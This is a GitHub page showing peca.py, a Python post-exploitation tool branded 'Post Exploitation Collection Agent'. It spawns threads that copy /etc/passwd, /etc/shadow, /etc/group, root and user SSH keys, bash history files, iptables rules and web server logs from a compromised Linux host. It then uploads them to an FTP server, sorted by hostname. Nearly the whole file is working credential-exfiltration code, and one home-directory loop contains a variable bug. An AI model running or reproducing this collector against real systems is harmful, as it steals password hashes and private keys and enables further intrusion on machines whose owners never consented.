-
Notifications
You must be signed in to change notification settings - Fork 1
/
peca.py
500 lines (442 loc) · 17.1 KB
/
peca.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
import os
import imp
import time
import socket
import string
import ftplib
import threading
# Redefinition of true and false for older python
True = 1
False = 0
lock = threading.Lock()
def check_if_directory_exist(session, directory):
lock.acquire()
filelist = []
found = False
print "[*] Checking if directory %s exists" % directory
session.retrlines('LIST', filelist.append)
for f in filelist:
if string.split(f," ")[-1] == directory:
found = True
lock.release()
return found
class PasswdShadowGroupAgent(threading.Thread):
def __init__(self, ftpserver, ftpport, ftpuser, ftppass, core_directory):
self.agentName = "Passwd/Shadow/Group Agent"
self.ftpserver = ftpserver
self.ftpport = ftpport
self.ftpuser = ftpuser
self.ftppass = ftppass
self.module_path = "PasswdShadowGroup"
self.session = None
self.coredirectory = core_directory
threading.Thread.__init__(self)
def run(self):
print "[-] Starting %s Agent" % self.agentName
self.connect_to_ftp()
try:
self.run_task()
except:
#Only to preserve other task
print '[!] Error occured in %s' % self.agentName
self.session.quit()
print "[#] %s Finished" % self.agentName
def connect_to_ftp(self):
self.session = ftplib.FTP()
self.session.connect(self.ftpserver, self.ftpport)
self.session.login(self.ftpuser, self.ftppass)
self.session.cwd(self.coredirectory)
self.create_folder()
self.session.cwd(self.module_path)
def create_folder(self):
if check_if_directory_exist(self.session, self.module_path):
pass
else:
# Create folder
self.session.mkd(self.module_path)
def upload_file(self, filepath, binary):
# Delete old file
try:
self.session.delete(os.path.basename(filepath))
except:
pass
# Store new file
if binary:
self.session.storbinary('STOR %s' % os.path.basename(filepath), open(filepath, 'rb'))
else:
self.session.storlines('STOR %s' % os.path.basename(filepath), open(filepath, 'r'))
def run_task(self):
self.upload_file("/etc/passwd", False)
self.upload_file("/etc/shadow", False)
self.upload_file("/etc/group", False)
class BashConfigHistoryAgent(threading.Thread):
def __init__(self, ftpserver, ftpport, ftpuser, ftppass, core_directory):
self.agentName = "BashConfigHistory Agent"
self.ftpserver = ftpserver
self.ftpport = ftpport
self.ftpuser = ftpuser
self.ftppass = ftppass
self.module_path = "BashConfig"
self.session = None
self.coredirectory = core_directory
threading.Thread.__init__(self)
def run(self):
print "[-] Starting %s Agent" % self.agentName
self.connect_to_ftp()
try:
self.run_task()
except:
print '[!] Error occured in %s' % self.agentName
self.session.quit()
print "[#] %s Finished" % self.agentName
def connect_to_ftp(self):
self.session = ftplib.FTP()
self.session.connect(self.ftpserver, self.ftpport)
self.session.login(self.ftpuser, self.ftppass)
self.session.cwd(self.coredirectory)
self.create_folder()
self.session.cwd(self.module_path)
def create_folder(self):
if check_if_directory_exist(self.session, self.module_path):
pass
else:
# Create folder
self.session.mkd(self.module_path)
def upload_file(self, filepath, binary):
# Delete old file
try:
self.session.delete(os.path.basename(filepath))
except:
pass
# Store new file
if binary:
self.session.storbinary('STOR %s' % os.path.basename(filepath), open(filepath, 'rb'))
else:
self.session.storlines('STOR %s' % os.path.basename(filepath), open(filepath, 'r'))
def do_root_check(self):
# Create working folder
if check_if_directory_exist(self.session, "root"):
pass
else:
# Create folder
self.session.mkd("root")
self.session.cwd("root")
for file in os.listdir("/root"):
upload = False
if file == ".bash_history":
upload = True
elif file == ".bash_logout":
upload = True
elif file == ".bashrc":
upload = True
else:
pass
if upload:
self.upload_file("/root/"+file, False)
self.session.cwd("../")
def do_home_check(self):
for homefoldername in os.listdir("/home/"):
if os.path.isdir("/home/"+homefoldername):
# Check if the directory exit
if check_if_directory_exist(self.session, homefoldername):
pass
else:
# Create folder
self.session.mkd(homefoldername)
self.session.cwd(homefoldername)
for foldersinhome in os.listdir("/home/"+homefoldername):
if os.path.isfile("/home/"+homefoldername+"/"+foldersinhome):
upload = False
if file == ".bash_history":
upload = True
elif file == ".bash_logout":
upload = True
elif file == ".bashrc":
upload = True
else:
pass
if upload:
self.upload_file("/home/"+homefoldername+"/"+foldersinhome, False)
self.session.cwd("../")
self.session.cwd("../")
def run_task(self):
self.do_root_check()
self.do_home_check()
class WebServiceLogsAgent(threading.Thread):
def __init__(self, ftpserver, ftpport, ftpuser, ftppass, core_directory):
self.agentName = "WebServiceLogs Agent"
self.ftpserver = ftpserver
self.ftpport = ftpport
self.ftpuser = ftpuser
self.ftppass = ftppass
self.module_path = "WebServiceLogs"
self.session = None
self.coredirectory = core_directory
self.servicelogdict = { "httpd_etc" : "/etc/httpd/logs/",
"apache2" : "/var/log/apache2/",
"apache" : "/var/log/apache/",
"httpd" : "/var/log/httpd/",
"lighttpd" : "/var/log/lighttpd/",
"webmin" : "/var/webmin/",
"www" : "/var/www/logs"
}
threading.Thread.__init__(self)
def run(self):
print "[-] Starting %s Agent" % self.agentName
self.connect_to_ftp()
try:
self.run_task()
except:
#Only to preserve other task
print '[!] Error occured in %s' % self.agentName
self.session.quit()
print "[#] %s Finished" % self.agentName
def connect_to_ftp(self):
self.session = ftplib.FTP()
self.session.connect(self.ftpserver, self.ftpport)
self.session.login(self.ftpuser, self.ftppass)
self.session.cwd(self.coredirectory)
self.create_folder()
self.session.cwd(self.module_path)
def create_folder(self):
if check_if_directory_exist(self.session, self.module_path):
pass
else:
# Create folder
self.session.mkd(self.module_path)
def upload_file(self, filepath, binary):
# Delete old file
try:
self.session.delete(os.path.basename(filepath))
except:
pass
# Store new file
if binary:
self.session.storbinary('STOR %s' % os.path.basename(filepath), open(filepath, 'rb'))
else:
self.session.storlines('STOR %s' % os.path.basename(filepath), open(filepath, 'r'))
def run_task(self):
for key in self.servicelogdict.keys():
time.sleep(1)
if os.path.exists(self.servicelogdict[key]):
# Check if the directory exit
if check_if_directory_exist(self.session, key):
pass
else:
# Create folder
self.session.mkd(key)
self.session.cwd(key)
for conffile in os.listdir(self.servicelogdict[key]):
self.upload_file(self.servicelogdict[key]+conffile, False)
self.session.cwd("../")
class SSHKeyAgent(threading.Thread):
def __init__(self, ftpserver, ftpport, ftpuser, ftppass, core_directory):
self.agentName = "SSHKey Agent"
self.ftpserver = ftpserver
self.ftpport = ftpport
self.ftpuser = ftpuser
self.ftppass = ftppass
self.module_path = "SSH"
self.session = None
self.coredirectory = core_directory
threading.Thread.__init__(self)
def run(self):
print "[-] Starting %s Agent" % self.agentName
self.connect_to_ftp()
try:
self.run_task()
except:
print '[!] Error occured in %s' % self.agentName
self.session.quit()
print "[#] %s Finished" % self.agentName
def connect_to_ftp(self):
self.session = ftplib.FTP()
self.session.connect(self.ftpserver, self.ftpport)
self.session.login(self.ftpuser, self.ftppass)
self.session.cwd(self.coredirectory)
self.create_folder()
self.session.cwd(self.module_path)
def create_folder(self):
if check_if_directory_exist(self.session, self.module_path):
pass
else:
# Create folder
self.session.mkd(self.module_path)
def upload_file(self, filepath, binary):
# Delete old file
try:
self.session.delete(os.path.basename(filepath))
except:
pass
# Store new file
if binary:
self.session.storbinary('STOR %s' % os.path.basename(filepath), open(filepath, 'rb'))
else:
self.session.storlines('STOR %s' % os.path.basename(filepath), open(filepath, 'r'))
def do_root_check(self):
# Create working folder
if check_if_directory_exist(self.session, "root"):
pass
else:
# Create folder
self.session.mkd("root")
self.session.cwd("root")
for file in os.listdir("/root"):
if file == ".ssh":
for file in os.listdir("/root/.ssh/"):
self.upload_file("/root/.ssh/"+file, False)
self.session.cwd("../")
def do_home_check(self):
for homefoldername in os.listdir("/home/"):
if os.path.isdir("/home/"+homefoldername):
# Check if the directory exit
if check_if_directory_exist(self.session, homefoldername):
pass
else:
# Create folder
self.session.mkd(homefoldername)
self.session.cwd(homefoldername)
for foldersinhome in os.listdir("/home/"+homefoldername):
if foldersinhome == ".ssh":
for filesinhome in os.listdir("/home/"+homefoldername+"/"+foldersinhome):
self.upload_file("/home/"+homefoldername+"/"+foldersinhome+"/"+filesinhome, False)
self.session.cwd("../")
self.session.cwd("../")
def run_task(self):
self.do_root_check()
self.do_home_check()
class IPTablesAgent(threading.Thread):
def __init__(self, ftpserver, ftpport, ftpuser, ftppass, core_directory):
self.agentName = "IPTables Agent"
self.ftpserver = ftpserver
self.ftpport = ftpport
self.ftpuser = ftpuser
self.ftppass = ftppass
self.module_path = "IPTables"
self.session = None
self.coredirectory = core_directory
threading.Thread.__init__(self)
def run(self):
print "[-] Starting %s Agent" % self.agentName
self.connect_to_ftp()
try:
self.run_task()
except:
#Only to preserve other task
print '[!] Error occured in %s' % self.agentName
self.session.quit()
print "[#] %s Finished" % self.agentName
def connect_to_ftp(self):
self.session = ftplib.FTP()
self.session.connect(self.ftpserver, self.ftpport)
self.session.login(self.ftpuser, self.ftppass)
self.session.cwd(self.coredirectory)
self.create_folder()
self.session.cwd(self.module_path)
def create_folder(self):
if check_if_directory_exist(self.session, self.module_path):
pass
else:
# Create folder
self.session.mkd(self.module_path)
def upload_file(self, filepath, binary):
# Delete old file
try:
self.session.delete(os.path.basename(filepath))
except:
pass
# Store new file
if binary:
self.session.storbinary('STOR %s' % os.path.basename(filepath), open(filepath, 'rb'))
else:
self.session.storlines('STOR %s' % os.path.basename(filepath), open(filepath, 'r'))
def run_task(self):
if os.path.exists("/etc/sysconfig/iptables"):
self.upload_file("/etc/sysconfig/iptables", False)
if os.path.exists("/etc/sysconfig/ip6tables"):
self.upload_file("/etc/sysconfig/ip6tables", False)
class Peca:
def __init__(self, ftpserver, ftpport, ftpuser, ftppass, folderpath):
self.ftpserver = ftpserver
self.ftpport = ftpport
self.ftpuser = ftpuser
self.ftppass = ftppass
self.folderpath = folderpath
self.session = None
self.machine_name = socket.gethostname()
self.agentthreads = []
self.fullpath = folderpath+"/"+self.machine_name
def connect_to_ftp(self):
print "[*] Starting Peca with following "
print "[*] Performing initial connection test to " + self.ftpserver
try:
self.session = ftplib.FTP()
self.session.connect(self.ftpserver, int(self.ftpport))
loginResult = self.session.login(self.ftpuser, self.ftppass)
print "[*] Connection test passed"
except:
print "[!] Error during connection shutting down"
exit()
self.check_working_directories()
self.session.quit()
print "[*] Spinning up agents"
self.spin_up_agents()
def spin_up_agents(self):
# Add all the thread objects
self.agentthreads.append(SSHKeyAgent(self.ftpserver, self.ftpport, self.ftpuser, self.ftppass, self.fullpath))
self.agentthreads.append(PasswdShadowGroupAgent(self.ftpserver, self.ftpport, self.ftpuser, self.ftppass, self.fullpath))
self.agentthreads.append(BashConfigHistoryAgent(self.ftpserver, self.ftpport, self.ftpuser, self.ftppass, self.fullpath))
self.agentthreads.append(IPTablesAgent(self.ftpserver, self.ftpport, self.ftpuser, self.ftppass, self.fullpath))
# Disabled by default due to time consuming process and older pythons time out
#self.agentthreads.append(WebServiceLogsAgent(self.ftpserver, self.ftpport, self.ftpuser, self.ftppass, self.fullpath))
# Start all the threads
for x in self.agentthreads:
x.start()
# Wait for all of them to finish
for y in self.agentthreads:
y.join()
def check_working_directories(self):
if check_if_directory_exist(self.session, self.folderpath):
print "[*] Directory found"
else:
print "[*] Directory not found attempting to create"
try:
self.session.mkd(self.folderpath)
print "[*] Directory created"
except:
print "[!] Could not create folder"
print "[!] Need Acess to create folder"
exit()
self.session.cwd(self.folderpath)
if check_if_directory_exist(self.session, self.machine_name):
print "[*] Directory found"
else:
print "[*] Directory not found attempting to create"
try:
self.session.mkd(self.machine_name)
print "[*] Directory created"
except:
print "[!] Could not create folder"
print "[!] Need Access to create folder"
exit()
def print_banner():
banner = """
____ _______________
/ __ \/ ____/ ____/ |
/ /_/ / __/ / / / /| |
/ ____/ /___/ /___/ ___ |
/_/ /_____/\____/_/ |_|
Post Exploitation Collection Agent
"""
print banner
def main():
print_banner()
ftpserver="127.0.0.1"
ftpport=21
ftpuser="pecauser"
ftppass="pecapass"
folderpath="pub"
peca = Peca(ftpserver, ftpport, ftpuser, ftppass, folderpath)
peca.connect_to_ftp()
if __name__ == "__main__":
main()